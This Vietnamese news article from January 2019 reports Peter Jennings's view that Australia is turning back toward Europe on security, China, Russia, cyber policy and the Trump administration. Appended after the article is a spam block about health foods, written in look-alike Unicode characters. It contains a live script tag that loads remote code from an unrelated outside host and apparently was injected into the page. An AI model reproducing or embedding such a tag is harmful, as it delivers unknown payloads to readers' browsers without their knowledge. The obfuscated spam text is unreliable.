RSS

Úc xoay trục chiến lược trở lại phía châu Âu trong các lĩnh vực an ninh, chính sách đối ngoại

17:00 22/01/2019

Giám đốc điều hành Viện Chính sách chiến lược Úc thông tin, nước này đang xoay trục chiến lược trở lại phía châu Âu trong các lĩnh vực an ninh, chính sách đối ngoại và phát triển.

Theo đó, Peter Jennings, Giám đốc điều hành Viện Chính sách chiến lược Australia và là cựu Phó Thư ký chiến lược thuộc Bộ Quốc phòng Australia, vừa có bài viết đăng trên trang mạng của Học viện Quốc tế Australia về mối quan hệ giữa Australia và châu Âu.

Bài viết nói về các vấn đề như Trung Quốc, Nga, an ninh mạng, chính sách của Tổng thống Mỹ Donald Trump và sự bất ổn của nền dân chủ phương Tây.

Những rủi ro này liên kết với nhau, buộc các nền dân chủ trên thế giới suy nghĩ kỹ hơn về biện pháp bảo vệ lợi ích của mình.

Ông cho rằng thế giới đang miễn cưỡng nhận ra rằng Trung Quốc không chỉ là cơ hội tăng trưởng lớn mà còn là một quốc gia có chủ nghĩa dân tộc, có sức mạnh quân sự khổng lồ ngày càng tăng và tham vọng tái lập trật tự thế giới.

Có thể thấy thách thức này có tính cấp bách hơn đối với Úc do quốc gia này đã tự khiến mình ngày càng phụ thuộc về kinh tế vào Trung Quốc.

Nghị viện Australia đã ban hành luật mới nhằm ngăn chặn Trung Quốc gây ảnh hưởng tới các hoạt động chính trị của Australia.

Xuất hiện ý thức chính trị mạnh mẽ hơn tại Australia về việc hỗ trợ cho các quốc đảo láng giềng Thái Bình Dương và tại khu vực Đông Nam Á để ngăn chặn sự thống trị chiến lược ngày càng gia tăng nhanh chóng của Trung Quốc.

Với nhiều người châu Âu, Trung Quốc cách rất xa và có lẽ là nơi để tìm kiếm những cơ hội làm ăn kinh tế hơn là một rủi ro chiến lược. Thậm chí một vài quốc gia châu Âu đã bắt đầu bày tỏ lo lắng về mức độ cho phép Trung Quốc đầu tư vào các cơ sở hạ tầng quan trọng và vấn đề bảo vệ quyền sở hữu trí tuệ.

Có thể thấy Liên minh châu Âu (EU) và Australia có lợi ích chung trong việc chia sẻ các chiến lược để chống lại sự can dự quá mức của Bắc Kinh, đồng thời Australia cũng cần phát triển thị trường đa dạng hơn nhằm giảm ảnh hưởng về kinh tế của Trung Quốc.

Còn nước Nga, kinh tế Nga có quy mô tương đương Australia, nhưng năng lực hạt nhân, chính sách hiện đại hóa quân sự nhanh chóng và chính sách đối ngoại quyết đoán và cứng rắn đã khiến Moskva trở thành mối đe dọa chiến lược đối với EU và rộng hơn là lợi ích của phương Tây.

Ngoài ra, trong bối cảnh công nghệ 5G đang trở thành “xương sống” của Mạng lưới vạn vật kết nối Internet, là yếu tố quan trọng nhất của cơ sở hạ tầng quan trọng ở khắp mọi nơi, Australia và EU cần tăng cường hơn nữa hợp tác về an ninh mạng.

Trong đó, ưu tiên thứ nhất là bảo vệ chống trộm cắp tài sản trí tuệ. Ưu tiên thứ hai là đảm bảo an ninh cho các hệ thống bầu cử, chống lại sự thao túng làm suy yếu niềm tin của cử tri.

Ưu tiên thứ ba là thiết lập các cơ chế bảo vệ hiệu quả hơn các cơ sở hạ tầng mạng quan trọng chống lại nguy cơ bị phá hủy bởi phần mềm độc hại do các đối thủ tạo ra.

Bên cạnh đó, một rủi ro khác mà Australia và các nước châu Âu cùng phải đối mặt, đó là chính quyền mà Tổng thống Mỹ Trump đang lãnh đạo.

Theo đó, kể từ khi cầm quyền, ông Trump dường như cố gắng phá hủy rất nhiều thể chế thời kỳ hậu chiến đã được xây dựng nên để tạo sự ổn định cho châu Âu và toàn cầu.

Tác giả này nhận định ông Trump chính là vấn đề cần quan tâm chứ không phải tất cả nước Mỹ.

Thủ tướng Australia Scott Morrison (giữa). Ảnh: AFP/TTXVN

Với các chính sách mang tính “nước Mỹ trên hết” của ông Trump, Australia, EU và các nền dân chủ khác như Nhật Bản và Ấn Độ phải nỗ lực hơn để thúc đẩy lợi ích an ninh chung. Điều này cũng là động lực cho mối quan hệ giữa Australia và EU trở nên gắn kết hơn.

Ngoài ra, sự bất ổn trong hệ thống dân chủ đang "càn quét" tất cả các quốc gia, tạo ra sự ngờ vực trong chính trị và đẩy những người ủng hộ tham gia vào các nhóm chính trị cực đoan.

Theo tác giả bài viết này, khuyến nghị Australia và EU sử dụng các giá trị chung để giải quyết các căn nguyên gây bất ổn chính trị, làm phát sinh các chính phủ yếu kém.

Khi thế giới tràn đầy rủi ro bất ổn, các nền dân chủ cần xích lại gần nhau và đó cũng chính là những gì đang diễn ra với mối quan hệ Australia – EU.

Trước đó vào ngày 7/8/2017, thỏa thuận khung Australia – EU được ký bởi cựu Ngoại trưởng Australia Julie Bishop và Đại diện cấp cao về chính sách an ninh và đối ngoại của EU, bà Federica Mogherini, đã được thông qua và trong thời gian chờ Ủy ban Hiệp ước Nghị viện Australia phê chuẩn.

Có thể thấy, một mạng lưới tương tác liên chính phủ trên một loạt lĩnh vực và chính sách cho thấy đã có nhiều mối liên hệ thực tế giữa các chính trị gia, quan chức, học giả và giới lãnh đạo doanh nghiệp Australia và châu Âu.

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.